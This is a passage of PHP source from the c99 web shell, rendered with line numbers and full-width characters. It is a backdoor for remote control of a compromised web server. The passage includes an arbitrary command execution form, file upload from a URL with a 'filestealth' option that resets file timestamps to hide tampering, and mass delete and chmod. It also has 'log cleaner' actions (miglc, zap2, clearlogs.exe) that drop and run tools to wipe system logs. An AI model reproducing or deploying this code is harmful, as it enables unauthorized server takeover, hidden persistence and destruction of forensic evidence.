2369. $search_i_d ＝ 0;
2370. $a ＝ array
2371. （
2372. "name"＝＞$search_name, "name_regexp"＝＞$search_name_regexp,
2373. "text"＝＞$search_text, "text_regexp"＝＞$search_text_regxp,
2374. "text_wwo"＝＞$search_text_wwo,
2375. "text_cs"＝＞$search_text_cs,
2376. "text_not"＝＞$search_text_not
2377. ）;
2378. $searchtime ＝ getmicrotime（）;
2379. $in ＝ array_unique（explode（";",$search_in））;
2380. foreach（$in as $v） {c99fsearch（$v）;}
2381. $searchtime ＝ round（getmicrotime（）-$searchtime,4）;
2382. if （count（$found） ＝＝ 0） {echo "＜b＞No files found!＜/b＞";}
2383. else
2384. {
2385. $ls_arr ＝ $found;
2386. $disp_fullpath ＝ TRUE;
2387. $act ＝ "ls";
2388. }
2389. }
2390. echo "＜form method＝POST＞
2391. ＜input type＝hidden name＝\"d\" value＝\"".$dispd."\"＞＜input type＝hidden name＝act value＝\"".$dspact."\"＞
2392. ＜b＞Search for （file/folder name）: ＜/b＞＜input type＝\"text\" name＝\"search_name\" size＝\"".round（strlen（$search_name）+25）."\" value＝\"".htmlspecialchars（$search_name）."\"＞ ＜input type＝\"checkbox\" name＝\"search_name_regexp\" value＝\"1\" ".（$search_name_regexp ＝＝ 1?" checked":""）."＞ - regexp
2393. ＜br＞＜b＞Search in （explode \";\"）: ＜/b＞＜input type＝\"text\" name＝\"search_in\" size＝\"".round（strlen（$search_in）+25）."\" value＝\"".htmlspecialchars（$search_in）."\"＞
2394. ＜br＞＜br＞＜b＞Text:＜/b＞＜br＞＜textarea name＝\"search_text\" cols＝\"122\" rows＝\"10\"＞".htmlspecialchars（$search_text）."＜/textarea＞
2395. ＜br＞＜br＞＜input type＝\"checkbox\" name＝\"search_text_regexp\" value＝\"1\" ".（$search_text_regexp ＝＝ 1?" checked":""）."＞ - regexp
2396.   ＜input type＝\"checkbox\" name＝\"search_text_wwo\" value＝\"1\" ".（$search_text_wwo ＝＝ 1?" checked":""）."＞ - ＜u＞w＜/u＞hole words only
2397.   ＜input type＝\"checkbox\" name＝\"search_text_cs\" value＝\"1\" ".（$search_text_cs ＝＝ 1?" checked":""）."＞ - cas＜u＞e＜/u＞ sensitive
2398.   ＜input type＝\"checkbox\" name＝\"search_text_not\" value＝\"1\" ".（$search_text_not ＝＝ 1?" checked":""）."＞ - find files ＜u＞NOT＜/u＞ containing the text
2399. ＜br＞＜br＞＜input type＝submit name＝submit value＝\"Search\"＞＜/form＞";
2400. if （$act ＝＝ 'ls'） {$dspact ＝ $act; echo "＜hr size＝\"1\" noshade＞＜b＞Search took ".$searchtime." secs （".$search_i_f." files and ".$search_i_d." folders, ".round（（$search_i_f+$search_i_d）/$searchtime,4）." objects per second）.＜/b＞＜br＞＜br＞";}
2401. }
2402. if （$act ＝＝ 'chmod'）
2403. {
2404. $mode ＝ fileperms（$d.$f）;
2405. if （!$mode） {echo "＜b＞Change file-mode with error:＜/b＞ can't get current value.";}
2406. else
2407. {
2408. $form ＝ TRUE;
2409. if （$chmod_submit）
2410. {
2411. $octet ＝ "0".base_convert（（$chmod_o["r"]?1:0）.（$chmod_o["w"]?1:0）.（$chmod_o["x"]?1:0）.（$chmod_g["r"]?1:0）.（$chmod_g["w"]?1:0）.（$chmod_g["x"]?1:0）.（$chmod_w["r"]?1:0）.（$chmod_w["w"]?1:0）.（$chmod_w["x"]?1:0）,2,8）;
2412. if （chmod（$d.$f,$octet）） {$act ＝ "ls"; $form ＝ FALSE; $err ＝ "";}
2413. else {$err ＝ "Can't chmod to ".$octet.".";}
2414. }
2415. if （$form）
2416. {
2417. $perms ＝ parse_perms（$mode）;
2418. echo "＜b＞Changing file-mode （".$d.$f."）, ".view_perms_color（$d.$f）." （".substr（decoct（fileperms（$d.$f））,-4,4）."）＜/b＞＜br＞".（$err?"＜b＞Error:＜/b＞ ".$err:""）."＜form action＝\"".$surl."\" method＝POST＞＜input type＝hidden name＝d value＝\"".htmlspecialchars（$d）."\"＞＜input type＝hidden name＝f value＝\"".htmlspecialchars（$f）."\"＞＜input type＝hidden name＝act value＝chmod＞＜table align＝left width＝300 border＝0 cellspacing＝0 cellpadding＝5＞＜tr＞＜td＞＜b＞Owner＜/b＞＜br＞＜br＞＜input type＝checkbox NAME＝chmod_o[r] value＝1".（$perms["o"]["r"]?" checked":""）."＞ Read＜br＞＜input type＝checkbox name＝chmod_o[w] value＝1".（$perms["o"]["w"]?" checked":""）."＞ Write＜br＞＜input type＝checkbox NAME＝chmod_o[x] value＝1".（$perms["o"]["x"]?" checked":""）."＞eXecute＜/td＞＜td＞＜b＞Group＜/b＞＜br＞＜br＞＜input type＝checkbox NAME＝chmod_g[r] value＝1".（$perms["g"]["r"]?" checked":""）."＞ Read＜br＞＜input type＝checkbox NAME＝chmod_g[w] value＝1".（$perms["g"]["w"]?" checked":""）."＞ Write＜br＞＜input type＝checkbox NAME＝chmod_g[x] value＝1".（$perms["g"]["x"]?" checked":""）."＞eXecute＜/font＞＜/td＞＜td＞＜b＞World＜/b＞＜br＞＜br＞＜input type＝checkbox NAME＝chmod_w[r] value＝1".（$perms["w"]["r"]?" checked":""）."＞ Read＜br＞＜input type＝checkbox NAME＝chmod_w[w] value＝1".（$perms["w"]["w"]?" checked":""）."＞ Write＜br＞＜input type＝checkbox NAME＝chmod_w[x] value＝1".（$perms["w"]["x"]?" checked":""）."＞eXecute＜/font＞＜/td＞＜/tr＞＜tr＞＜td＞＜input type＝submit name＝chmod_submit value＝\"Save\"＞＜/td＞＜/tr＞＜/table＞＜/form＞";
2419. }
2420. }
2421. }
2422. if （$act ＝＝ "upload"）
2423. {
2424. $uploadmess ＝ "";
2425. $uploadpath ＝ str_replace（"\\",DIRECTORY_SEPARATOR,$uploadpath）;
2426. if （empty（$uploadpath）） {$uploadpath ＝ $d;}
2427. elseif （substr（$uploadpath,-1） !＝ "/"） {$uploadpath .＝ "/";}
2428. if （!empty（$submit））
2429. {
2430. global $HTTP_POST_FILES;
2431. $uploadfile ＝ $HTTP_POST_FILES["uploadfile"];
2432. if （!empty（$uploadfile["tmp_name"]））
2433. {
2434. if （empty（$uploadfilename）） {$destin ＝ $uploadfile["name"];}
2435. else {$destin ＝ $userfilename;}
2436. if （!move_uploaded_file（$uploadfile["tmp_name"],$uploadpath.$destin）） {$uploadmess .＝ "Error uploading file ".$uploadfile["name"]." （can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!＜br＞";}
2437. }
2438. elseif （!empty（$uploadurl））
2439. {
2440. if （!empty（$uploadfilename）） {$destin ＝ $uploadfilename;}
2441. else
2442. {
2443. $destin ＝ explode（"/",$destin）;
2444. $destin ＝ $destin[count（$destin）-1];
2445. if （empty（$destin））
2446. {
2447. $i ＝ 0;
2448. $b ＝ "";
2449. while（file_exists（$uploadpath.$destin）） {if （$i ＞ 0） {$b ＝ "_".$i;} $destin ＝ "index".$b.".html"; $i++;}}
2450. }
2451. if （（!eregi（"http://",$uploadurl）） and （!eregi（"https://",$uploadurl）） and （!eregi（"ftp://",$uploadurl））） {echo "＜b＞Incorect url!＜/b＞＜br＞";}
2452. else
2453. {
2454. $st ＝ getmicrotime（）;
2455. $content ＝ @file_get_contents（$uploadurl）;
2456. $dt ＝ round（getmicrotime（）-$st,4）;
2457. if （!$content） {$uploadmess .＝ "Can't download file!＜br＞";}
2458. else
2459. {
2460. if （$filestealth） {$stat ＝ stat（$uploadpath.$destin）;}
2461. $fp ＝ fopen（$uploadpath.$destin,"w"）;
2462. if （!$fp） {$uploadmess .＝ "Error writing to file ".htmlspecialchars（$destin）."!＜br＞";}
2463. else
2464. {
2465. fwrite（$fp,$content,strlen（$content））;
2466. fclose（$fp）;
2467. if （$filestealth） {touch（$uploadpath.$destin,$stat[9],$stat[8]）;}
2468. }
2469. }
2470. }
2471. }
2472. }
2473. if （$miniform）
2474. {
2475. echo "＜b＞".$uploadmess."＜/b＞";
2476. $act ＝ "ls";
2477. }
2478. else
2479. {
2480. echo "＜b＞File upload:＜/b＞＜br＞＜b＞".$uploadmess."＜/b＞＜form enctype＝\"multipart/form-data\" action＝\"".$surl."act＝upload&d＝".urlencode（$d）."\" method＝POST＞
2481. Select file on your local computer: ＜input name＝\"uploadfile\" type＝\"file\"＞＜br＞               or＜br＞
2482. Input URL: ＜input name＝\"uploadurl\" type＝\"text\" value＝\"".htmlspecialchars（$uploadurl）."\" size＝\"70\"＞＜br＞＜br＞
2483. Save this file dir: ＜input name＝\"uploadpath\" size＝\"70\" value＝\"".$dispd."\"＞＜br＞＜br＞
2484. File-name （auto-fill）: ＜input name＝uploadfilename size＝25＞＜br＞＜br＞
2485. ＜input type＝checkbox name＝uploadautoname value＝1 id＝df4＞ convert file name to lovercase＜br＞＜br＞
2486. ＜input type＝submit name＝submit value＝\"Upload\"＞
2487. ＜/form＞";
2488. }
2489. }
2490. if （$act ＝＝ 'md5file'） {
2491. ?＞
2492. ＜center＞＜b＞MD5 Checksum:＜/b＞＜/center＞＜br＞
2493. ＜table border＝0 align＝center＞
2494. ＜?php
2495. foreach （$actbox as $v）
2496. echo '＜tr＞＜td＞'.md5_file（$v）.'＜/td＞＜td＞'.$v.'＜/td＞＜/tr＞';
2497. echo "＜/table＞＜/td＞＜/tr＞＜/table＞＜br＞＜TABLE style＝\"BORDER-COLLAPSE: collapse\" cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 width＝\"100%\" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1＞＜tr＞＜td width＝\"100%\" valign＝\"top\"＞";
2498. $act ＝ 'ls';
2499. }
2500. if （$act ＝＝ 'sha1file'） {
2501. ?＞
2502. ＜center＞＜b＞SHA1 Checksum:＜/b＞＜/center＞＜br＞
2503. ＜table border＝0 align＝center＞
2504. ＜?php
2505. foreach （$actbox as $v）
2506. echo '＜tr＞＜td＞'.sha1_file（$v）.'＜/td＞＜td＞'.$v.'＜/td＞＜/tr＞';
2507. echo "＜/table＞＜/td＞＜/tr＞＜/table＞＜br＞＜TABLE style＝\"BORDER-COLLAPSE: collapse\" cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 width＝\"100%\" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1＞＜tr＞＜td width＝\"100%\" valign＝\"top\"＞";
2508. $act ＝ 'ls';
2509. }
2510. if （$act ＝＝ 'delete'）
2511. {
2512. $delerr ＝ '';
2513. foreach （$actbox as $v）
2514. {
2515. $result ＝ FALSE;
2516. $result ＝ fs_rmobj（$v）;
2517. if （!$result）
2518. $delerr .＝ 'Can\'t delete '.htmlspecialchars（$v）.'＜br＞';
2519. }
2520. if （!empty（$delerr））
2521. echo '＜b＞Deleting with errors:＜/b＞＜br＞'.$delerr;
2522. $act ＝ 'ls';
2523. }
2524. if （!$usefsbuff）
2525. {
2526. if （（$act ＝＝ "paste"） or （$act ＝＝ "copy"） or （$act ＝＝ "cut"） or （$act ＝＝ "unselect"）） {echo "＜center＞＜b＞Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.＜/center＞";}
2527. }
2528. else
2529. {
2530. if （$act ＝＝ "copy"） {$err ＝ ""; $sess_data["copy"] ＝ array_merge（$sess_data["copy"],$actbox）; c99_sess_put（$sess_data）; $act ＝ "ls"; }
2531. elseif （$act ＝＝ "cut"） {$sess_data["cut"] ＝ array_merge（$sess_data["cut"],$actbox）; c99_sess_put（$sess_data）; $act ＝ "ls";}
2532. elseif （$act ＝＝ "unselect"） {foreach （$sess_data["copy"] as $k＝＞$v） {if （in_array（$v,$actbox）） {unset（$sess_data["copy"][$k]）;}} foreach （$sess_data["cut"] as $k＝＞$v） {if （in_array（$v,$actbox）） {unset（$sess_data["cut"][$k]）;}} c99_sess_put（$sess_data）; $act ＝ "ls";}
2533. if （$actemptybuff） {$sess_data["copy"] ＝ $sess_data["cut"] ＝ array（）; c99_sess_put（$sess_data）;}
2534. elseif （$actpastebuff）
2535. {
2536. $psterr ＝ "";
2537. foreach（$sess_data["copy"] as $k＝＞$v）
2538. {
2539. $to ＝ $d.basename（$v）;
2540. if （!fs_copy_obj（$v,$to）） {$psterr .＝ "Can't copy ".$v." to ".$to."!＜br＞";}
2541. if （$copy_unset） {unset（$sess_data["copy"][$k]）;}
2542. }
2543. foreach（$sess_data["cut"] as $k＝＞$v）
2544. {
2545. $to ＝ $d.basename（$v）;
2546. if （!fs_move_obj（$v,$to）） {$psterr .＝ "Can't move ".$v." to ".$to."!＜br＞";}
2547. unset（$sess_data["cut"][$k]）;
2548. }
2549. c99_sess_put（$sess_data）;
2550. if （!empty（$psterr）） {echo "＜b＞Pasting with errors:＜/b＞＜br＞".$psterr;}
2551. $act ＝ "ls";
2552. }
2553. elseif （$actarcbuff）
2554. {
2555. $arcerr ＝ "";
2556. if （substr（$actarcbuff_path,-7,7） ＝＝ ".tar.gz"） {$ext ＝ ".tar.gz";}
2557. else {$ext ＝ ".tar.gz";}
2558. if （$ext ＝＝ ".tar.gz"） {$cmdline ＝ "tar cfzv";}
2559. $cmdline .＝ " ".$actarcbuff_path;
2560. $objects ＝ array_merge（$sess_data["copy"],$sess_data["cut"]）;
2561. foreach（$objects as $v）
2562. {
2563. $v ＝ str_replace（"\\",DIRECTORY_SEPARATOR,$v）;
2564. if （substr（$v,0,strlen（$d）） ＝＝ $d） {$v ＝ basename（$v）;}
2565. if （is_dir（$v））
2566. {
2567. if （substr（$v,-1） !＝ DIRECTORY_SEPARATOR） {$v .＝ DIRECTORY_SEPARATOR;}
2568. $v .＝ "*";
2569. }
2570. $cmdline .＝ " ".$v;
2571. }
2572. $tmp ＝ realpath（"."）;
2573. chdir（$d）;
2574. $ret ＝ myshellexec（$cmdline）;
2575. chdir（$tmp）;
2576. if （empty（$ret）） {$arcerr .＝ "Can't call archivator （".htmlspecialchars（str2mini（$cmdline,60））."）!＜br＞";}
2577. $ret ＝ str_replace（"\r\n","\n",$ret）;
2578. $ret ＝ explode（"\n",$ret）;
2579. if （$copy_unset） {foreach（$sess_data["copy"] as $k＝＞$v） {unset（$sess_data["copy"][$k]）;}}
2580. foreach（$sess_data["cut"] as $k＝＞$v）
2581. {
2582. if （in_array（$v,$ret）） {fs_rmobj（$v）;}
2583. unset（$sess_data["cut"][$k]）;
2584. }
2585. c99_sess_put（$sess_data）;
2586. if （!empty（$arcerr）） {echo "＜b＞Archivation errors:＜/b＞＜br＞".$arcerr;}
2587. $act ＝ "ls";
2588. }
2589. elseif （$actpastebuff）
2590. {
2591. $psterr ＝ "";
2592. foreach（$sess_data["copy"] as $k＝＞$v）
2593. {
2594. $to ＝ $d.basename（$v）;
2595. if （!fs_copy_obj（$v,$d）） {$psterr .＝ "Can't copy ".$v." to ".$to."!＜br＞";}
2596. if （$copy_unset） {unset（$sess_data["copy"][$k]）;}
2597. }
2598. foreach（$sess_data["cut"] as $k＝＞$v）
2599. {
2600. $to ＝ $d.basename（$v）;
2601. if （!fs_move_obj（$v,$d）） {$psterr .＝ "Can't move ".$v." to ".$to."!＜br＞";}
2602. unset（$sess_data["cut"][$k]）;
2603. }
2604. c99_sess_put（$sess_data）;
2605. if （!empty（$psterr）） {echo "＜b＞Pasting with errors:＜/b＞＜br＞".$psterr;}
2606. $act ＝ "ls";
2607. }
2608. }
2609. // the wipe logs stuff needs to be before cmd, because it will change the $act if the write is successful
2610. if （$act ＝＝ 'miglc' || $act ＝＝ 'zap2'） { // *nix cleaners
2611. if （is_writable（'.'）） {
2612. cf（$act, $$act）; // 'tis pure innovation of optimization :）
2613. $cmd ＝ './'.$act; // keep this before $act ＝ 'cmd';
2614. $act ＝ 'cmd';
2615. $cmd_txt ＝ '1';
2616. }else{
2617. echo 'Directory Is Not Writable!＜br＞';
2618. }
2619. }
2620. if （$act ＝＝ 'clearlogs'） { // windows cleaners
2621. if （is_writable（'.'）） {
2622. cf（$act.'.exe', $$act）;
2623. $cmd ＝ $act.'.exe';
2624. $act ＝ 'cmd';
2625. $cmd_txt ＝ '1';
2626. }else{
2627. echo 'Directory Is Not Writable!＜br＞';
2628. }
2629. }
2630. if （$act ＝＝ "cmd"）
2631. {
2632. if （trim（$cmd） ＝＝ "ps -aux"） {$act ＝ "processes";}
2633. elseif （trim（$cmd） ＝＝ "tasklist"） {$act ＝ "processes";}
2634. else
2635. {
2636. @chdir（$chdir）;
2637. if （!empty（$submit））
2638. {
2639. echo "＜b＞Result of execution this command＜/b＞:＜br＞";
2640. $olddir ＝ realpath（"."）;
2641. @chdir（$d）;
2642. $ret ＝ myshellexec（$cmd）;
2643. $ret ＝ convert_cyr_string（$ret,"d","w"）;
2644. if （$cmd_txt）
2645. {
2646. $rows ＝ count（explode（"\r\n",$ret））+1;
2647. if （$rows ＜ 10） {$rows ＝ 10;}
2648. echo "＜br＞＜textarea cols＝\"122\" rows＝\"".$rows."\" readonly＞".htmlspecialchars（$ret）."＜/textarea＞";
2649. }
2650. else {echo $ret."＜br＞";}
2651. @chdir（$olddir）;
2652. }
2653. else {echo "＜b＞Execution command＜/b＞"; if （empty（$cmd_txt）） {$cmd_txt ＝ TRUE;}}
2654. echo "＜form action＝\"".$surl."\" method＝POST＞＜input type＝hidden name＝act value＝cmd＞＜textarea name＝cmd cols＝122 rows＝10＞".htmlspecialchars（$cmd）."＜/textarea＞＜input type＝hidden name＝\"d\" value＝\"".$dispd."\"＞＜br＞＜br＞＜input type＝submit name＝submit value＝\"Execute\"＞ Display in text-area ＜input type＝\"checkbox\" name＝\"cmd_txt\" value＝\"1\""; if （$cmd_txt） {echo " checked";} echo "＞＜/form＞";
2655. }
2656. }
2657. if （$act ＝＝ 'ls'）
2658. {
2659. if （count（$ls_arr） ＞ 0） {$list ＝ $ls_arr;}
2660. else
2661. {
2662. $list ＝ array（）;
2663. if （$h ＝ @opendir（$d））
2664. {
2665. while （（$o ＝ readdir（$h）） !＝＝ FALSE） {$list[] ＝ $d.$o;}
2666. closedir（$h）;
2667. }
2668. else {}
2669. }
2670. if （count（$list） ＝＝ 0） {echo "＜center＞＜b＞Can't open folder （".htmlspecialchars（$d）."）!＜/b＞＜/center＞";}
2671. else
2672. {
2673. //Building array
2674. $objects ＝ array（）;
2675. $vd ＝ "f"; //Viewing mode
2676. if （$vd ＝＝ "f"）
2677. {
2678. $objects["head"] ＝ array（）;
2679. $objects["folders"] ＝ array（）;
2680. $objects["links"] ＝ array（）;
2681. $objects["files"] ＝ array（）;
2682. foreach （$list as $v）
2683. {
2684. $o ＝ basename（$v）;
2685. $row ＝ array（）;
2686. if （$o ＝＝ "."） {$row[] ＝ $d.$o; $row[] ＝ "LINK";}
2687. elseif （$o ＝＝ ".."） {$row[] ＝ $d.$o; $row[] ＝ "LINK";}
2688. elseif （is_dir（$v））
2689. {
2690. if （is_link（$v）） {$type ＝ "LINK";}
2691. else {$type ＝ "DIR";}
2692. $row[] ＝ $v;
2693. $row[] ＝ $type;
2694. }
2695. elseif（is_file（$v）） {$row[] ＝ $v; $row[] ＝ filesize（$v）;}
2696. $row[] ＝ filemtime（$v）;
2697. if （!$win）
2698. {
2699. $ow ＝ posix_getpwuid（fileowner（$v））;
2700. $gr ＝ posix_getgrgid（filegroup（$v））;
2701. $row[] ＝ （$ow["name"]?$ow["name"]:fileowner（$v））."/".（$gr["name"]?$gr["name"]:filegroup（$v））;
2702. }
2703. $row[] ＝ fileperms（$v）;
2704. if （（$o ＝＝ "."） or （$o ＝＝ ".."）） {$objects["head"][] ＝ $row;}
2705. elseif （is_link（$v）） {$objects["links"][] ＝ $row;}
2706. elseif （is_dir（$v）） {$objects["folders"][] ＝ $row;}
2707. elseif （is_file（$v）） {$objects["files"][] ＝ $row;}
2708. $i++;
2709. }
2710. $row ＝ array（）;
2711. $row[] ＝ '＜b＞Name＜/b＞';
2712. $row[] ＝ '＜b＞Size＜/b＞';
2713. $row[] ＝ '＜b＞Modify＜/b＞';
2714. if （!$win）
2715. $row[] ＝ '＜b＞Owner/Group＜/b＞';
2716. $row[] ＝ '＜b＞Perms＜/b＞';
2717. $row[] ＝ '＜b＞Action＜/b＞';
2718. $parsesort ＝ parsesort（$sort）;
2719. $sort ＝ $parsesort[0].$parsesort[1];
2720. $k ＝ $parsesort[0];
2721. if （$parsesort[1] !＝ "a"） {$parsesort[1] ＝ "d";}
2722. $y ＝ "＜a href＝\"".$surl."act＝".$dspact."&d＝".urlencode（$d）."&sort＝".$k.（$parsesort[1] ＝＝ "a"?"d":"a"）."\"＞";
2723. $y .＝ "＜img src＝\"".$surl."act＝img&img＝sort_".（$sort[1] ＝＝ "a"?"asc":"desc"）."\" height＝\"9\" width＝\"14\" alt＝\"".（$parsesort[1] ＝＝ "a"?"Asc.":"Desc"）."\" border＝\"0\"＞＜/a＞";
2724. $row[$k] .＝ $y;
2725. for（$i＝0;$i＜count（$row）-1;$i++）
2726. {
2727. if （$i !＝ $k） {$row[$i] ＝ "＜a href＝\"".$surl."act＝".$dspact."&d＝".urlencode（$d）."&sort＝".$i.$parsesort[1]."\"＞".$row[$i]."＜/a＞";}
2728. }
2729. $v ＝ $parsesort[0];
2730. usort（$objects["folders"], "tabsort"）;
2731. usort（$objects["links"], "tabsort"）;
2732. usort（$objects["files"], "tabsort"）;
2733. if （$parsesort[1] ＝＝ "d"）
2734. {
2735. $objects["folders"] ＝ array_reverse（$objects["folders"]）;
2736. $objects["files"] ＝ array_reverse（$objects["files"]）;
2737. }
2738. $objects ＝ array_merge（$objects["head"],$objects["folders"],$objects["links"],$objects["files"]）;
2739. $tab ＝ array（）;
2740. $tab["cols"] ＝ array（$row）;
2741. $tab["head"] ＝ array（）;
2742. $tab["folders"] ＝ array（）;
2743. $tab["links"] ＝ array（）;
2744. $tab["files"] ＝ array（）;
2745. $i ＝ 0;
2746. foreach （$objects as $a）
2747. {
2748. $v ＝ $a[0];
2749. $o ＝ basename（$v）;
2750. $dir ＝ dirname（$v）;
2751. if （$disp_fullpath） {$disppath ＝ $v;}
2752. else {$disppath ＝ $o;}
2753. $disppath ＝ str2mini（$disppath,60）;
2754. if （in_array（$v,$sess_data["cut"]）） {$disppath ＝ "＜strike＞".$disppath."＜/strike＞";}
2755. elseif （in_array（$v,$sess_data["copy"]）） {$disppath ＝ "＜u＞".$disppath."＜/u＞";}
2756. foreach （$regxp_highlight as $r）
2757. {
2758. if （ereg（$r[0],$o））
2759. {
2760. if （（!is_numeric（$r[1]）） or （$r[1] ＞ 3）） {$r[1] ＝ 0; ob_clean（）; echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit（）;}
2761. else
2762. {
2763. $r[1] ＝ round（$r[1]）;
2764. $isdir ＝ is_dir（$v）;
2765. if （（$r[1] ＝＝ 0） or （（$r[1] ＝＝ 1） and !$isdir） or （（$r[1] ＝＝ 2） and !$isdir））
2766. {
2767. if （empty（$r[2]）） {$r[2] ＝ "＜b＞"; $r[3] ＝ "＜/b＞";}
2768. $disppath ＝ $r[2].$disppath.$r[3];
2769. if （$r[4]） {break;}
2770. }
2771. }
2772. }
2773. }
2774. $uo ＝ urlencode（$o）;
2775. $ud ＝ urlencode（$dir）;
2776. $uv ＝ urlencode（$v）;
2777. $row ＝ array（）;
2778. if （$o ＝＝ "."）
2779. {
2780. $row[] ＝ "＜img src＝\"".$surl."act＝img&img＝small_dir\" height＝\"16\" width＝\"19\" border＝\"0\"＞ ＜a href＝\"".$surl."act＝".$dspact."&d＝".urlencode（realpath（$d.$o））."&sort＝".$sort."\"＞".$o."＜/a＞";
2781. $row[] ＝ "LINK";
2782. }
2783. elseif （$o ＝＝ ".."）
2784. {
2785. $row[] ＝ "＜img src＝\"".$surl."act＝img&img＝ext_lnk\" height＝\"16\" width＝\"19\" border＝\"0\"＞ ＜a href＝\"".$surl."act＝".$dspact."&d＝".urlencode（realpath（$d.$o））."&sort＝".$sort."\"＞".$o."＜/a＞";
2786. $row[] ＝ "LINK";
2787. }
2788. elseif （is_dir（$v））
2789. {
2790. if （is_link（$v））
2791. {
2792. $disppath .＝ " ＝＞ ".readlink（$v）;
2793. $type ＝ "LINK";
2794. $row[] ＝ "＜img src＝\"".$surl."act＝img&img＝ext_lnk\" height＝\"16\" width＝\"16\" border＝\"0\"＞ ＜a href＝\"".$surl."act＝ls&d＝".$uv."&sort＝".$sort."\"＞[".$disppath."]＜/a＞";
2795. }
2796. else
2797. {
2798. $type ＝ "DIR";
2799. $row[] ＝ "＜img src＝\"".$surl."act＝img&img＝small_dir\" height＝\"16\" width＝\"19\" border＝\"0\"＞ ＜a href＝\"".$surl."act＝ls&d＝".$uv."&sort＝".$sort."\"＞[".$disppath."]＜/a＞";
2800. }
2801. $row[] ＝ $type;
2802. }
2803. elseif（is_file（$v））
2804. {
2805. $ext ＝ explode（".",$o）;
2806. $c ＝ count（$ext）-1;
2807. $ext ＝ $ext[$c];
2808. $ext ＝ strtolower（$ext）;
2809. $row[] ＝ "＜img src＝\"".$surl."act＝img&img＝ext_".$ext."\" border＝\"0\"＞ ＜a href＝\"".$surl."act＝f&f＝".$uo."&d＝".$ud."&\"＞".$disppath."＜/a＞";
2810. $row[] ＝ view_size（$a[1]）;
2811. }
2812. $row[] ＝ date（"d.m.Y H:i:s",$a[2]）;
2813. if （!$win） {$row[] ＝ $a[3];}
2814. $row[] ＝ "＜a href＝\"".$surl."act＝chmod&f＝".$uo."&d＝".$ud."\"＞＜b＞".view_perms_color（$v）."＜/b＞＜/a＞";
2815. if （$o ＝＝ "."） {$checkbox ＝ "＜input type＝\"checkbox\" name＝\"actbox[]\" onclick＝\"ls_reverse_all（）;\"＞"; $i--;}
2816. else {$checkbox ＝ "＜input type＝\"checkbox\" name＝\"actbox[]\" id＝\"actbox".$i."\" value＝\"".htmlspecialchars（$v）."\"＞";}
2817. if （is_dir（$v）） {$row[] ＝ "＜a href＝\"".$surl."act＝d&d＝".$uv."\"＞＜img src＝\"".$surl."act＝img&img＝ext_diz\" alt＝\"Info\" height＝\"16\" width＝\"16\" border＝\"0\"＞＜/a＞ ".$checkbox;}
2818. else {$row[] ＝ "＜a href＝\"".$surl."act＝f&f＝".$uo."&ft＝info&d＝".$ud."\"＞＜img src＝\"".$surl."act＝img&img＝ext_diz\" alt＝\"Info\" height＝\"16\" width＝\"16\" border＝\"0\"＞＜/a＞ ＜a href＝\"".$surl."act＝f&f＝".$uo."&ft＝edit&d＝".$ud."\"＞＜img src＝\"".$surl."act＝img&img＝change\" alt＝\"Change\" height＝\"16\" width＝\"19\" border＝\"0\"＞＜/a＞ ＜a href＝\"".$surl."act＝f&f＝".$uo."&ft＝download&d＝".$ud."\"＞＜img src＝\"".$surl."act＝img&img＝download\" alt＝\"Download\" height＝\"16\" width＝\"19\" border＝\"0\"＞＜/a＞ ".$checkbox;}
2819. if （（$o ＝＝ "."） or （$o ＝＝ ".."）） {$tab["head"][] ＝ $row;}
2820. elseif （is_link（$v）） {$tab["links"][] ＝ $row;}
2821. elseif （is_dir（$v）） {$tab["folders"][] ＝ $row;}
2822. elseif （is_file（$v）） {$tab["files"][] ＝ $row;}
2823. $i++;
2824. }
2825. }
2826. // Compiling table
2827. $table ＝ array_merge（$tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]）;
2828. echo "＜center＞＜b＞Listing folder （".count（$tab["files"]）." files and ".（count（$tab["folders"]）+count（$tab["links"]））." folders）:＜/b＞＜/center＞＜br＞＜TABLE cellSpacing＝0 cellPadding＝0 width＝100% bgcolor＝#000000 borderColorLight＝#433333 border＝0＞＜form action＝\"".$surl."\" method＝POST name＝\"ls_form\"＞＜input type＝hidden name＝act value＝".$dspact.'＞＜input type＝hidden name＝d value＝"'.$dispd.'"＞';
2829. $countrows ＝ 0;
2830. foreach（$table as $row）
2831. {
2832. if （$countrows & 1） {
2833. echo "＜tr bgcolor＝#111111＞\r\n";
2834. } else {
2835. echo "＜tr＞\r\n";
2836. }
2837. ++$countrows;
2838. foreach（$row as $v） {echo "＜td＞".$v."＜/td＞\r\n";}
2839. echo "＜/tr＞\r\n";
2840. }
2841. echo "＜/table＞＜hr size＝\"1\" noshade＞＜p align＝\"right\"＞
2842. ＜script＞
2843. function ls_setcheckboxall（status）
2844. {
2845. var id ＝ 1;
2846. var num ＝ ".（count（$table）-2）.";
2847. while （id ＜＝ num）
2848. {
2849. document.getElementById（'actbox'+id）.checked ＝ status;
2850. id++;
2851. }
2852. }
2853. function ls_reverse_all（）
2854. {
2855. var id ＝ 1;
2856. var num ＝ ".（count（$table）-2）.";
2857. while （id ＜＝ num）
2858. {
2859. document.getElementById（'actbox'+id）.checked ＝ !document.getElementById（'actbox'+id）.checked;
2860. id++;
2861. }
2862. }
2863. ＜/script＞
2864. ＜input type＝\"button\" onclick＝\"ls_setcheckboxall（true）;\" value＝\"Select all\"＞  ＜input type＝\"button\" onclick＝\"ls_setcheckboxall（false）;\" value＝\"Unselect all\"＞
2865. ＜b＞＜img src＝\"".$surl."act＝img&img＝arrow_ltr\" border＝\"0\"＞";
2866. if （count（array_merge（$sess_data["copy"],$sess_data["cut"]）） ＞ 0 and （$usefsbuff））
2867. {
2868. echo "＜input type＝submit name＝actarcbuff value＝\"Pack buffer to archive\"＞ ＜input type＝\"text\" name＝\"actarcbuff_path\" value＝\"archive_".substr（md5（rand（1,1000）.rand（1,1000））,0,5）.".tar.gz\"＞      ＜input type＝submit name＝\"actpastebuff\" value＝\"Paste\"＞      ＜input type＝submit name＝\"actemptybuff\" value＝\"Empty buffer\"＞      ";
2869. }
2870. echo "＜select name＝act＞＜option value＝\"".$act."\"＞With selected:＜/option＞";
2871. echo "＜option value＝delete".（$dspact ＝＝ "delete"?" selected":""）."＞Delete＜/option＞";
